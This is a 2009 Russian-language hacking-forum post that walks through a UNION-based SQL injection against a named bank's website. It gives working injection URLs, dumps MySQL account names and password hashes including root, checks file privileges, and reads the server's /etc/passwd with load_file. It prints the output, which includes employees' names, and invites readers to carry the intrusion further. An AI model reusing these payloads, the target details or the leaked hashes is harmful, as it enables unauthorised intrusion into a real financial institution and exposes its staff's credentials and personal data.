Показать сообщение отдельно

А вот вам БАНК =)))
  #9  
Старый 25.01.2009, 00:14
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


Talking А вот вам БАНК =)))

А вот вам банк в домене ru:
www.kbhmb.ru
Код:
http://www.kbhmb.ru/index.php?id=7+union+select+1,2,convert(concat_ws(0x3a,user,password)+using+latin1),4,5,6,7,8+from+mysql.user--
логин/пасс:

Код:
vasselect:*8BF7ACF013E0D295ADE08E3A755EFB4D5EA47343
Код:
vasinsert:*8FF7E1FC81B393BF0DBA4C7E3655194DF97D78E7
Код:
max:*832EB84CB764129D05D498ED9CA7E5CE9B8F83EB
Код:
root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
Смотрим file_priv:
Код:
http://www.kbhmb.ru/index.php?id=7+union+select+1,2,convert(file_priv+using+latin1),4,5,6,7,8+from+mysql.user--
Ура, на рута права Y
Читаем ect/passwd:
Код:
http://www.kbhmb.ru/index.php?id=7+union+select+1,2,convert(load_file('/etc/passwd')+using+latin1),4,5,6,7,8+from+mysql.user--
Все читается:
Цитата:
toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64flogd privsep user:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin max:*:1001:1001omozhakov Maxim:/home/max:/bin/sh bbush:*:1002:1002:Basil Bush:/home/bbush:/bin/csh mysql:*:1004:1004:User &:/home/mysql:/bin/sh oracle:*:71:71:Oracle:/usr/local/oracle7:/bin/sh ftp:*:14:5:Anonymous FTP Admin:/usr/home/ftp:/nonexistent vit:*:1005:1005:Ridinger Vitaly:/home/vit:/bin/sh skat:*:1006:1006:skat:/home/vit/skat:/bin/sh e-sbyt:*:1007:1006:e-sbyt:/home/vit/e-sbyt:/bin/sh gorgas:*:1008:1006:Gor Gas:/home/vit/gorgas:/bin/sh idea:*:1009:1006:OOO IDEA:/home/vit/idea:/bin/sh domserv:*:1010:1006:domserv:/home/vit/domserv:/bin/sh
Можно есче сходить в коренную диру:
Код:
http://www.kbhmb.ru/index.php?id=7+union+select+1,2,convert(load_file('../../../')+using+latin1),4,5,6,7,8+from+mysql.user--
Ну вроде как все...дальше думаю сам разберешся
---------------------------------------------------------
The End!

Последний раз редактировалось -m0rgan-; 25.01.2009 в 00:18..
 
Ответить с цитированием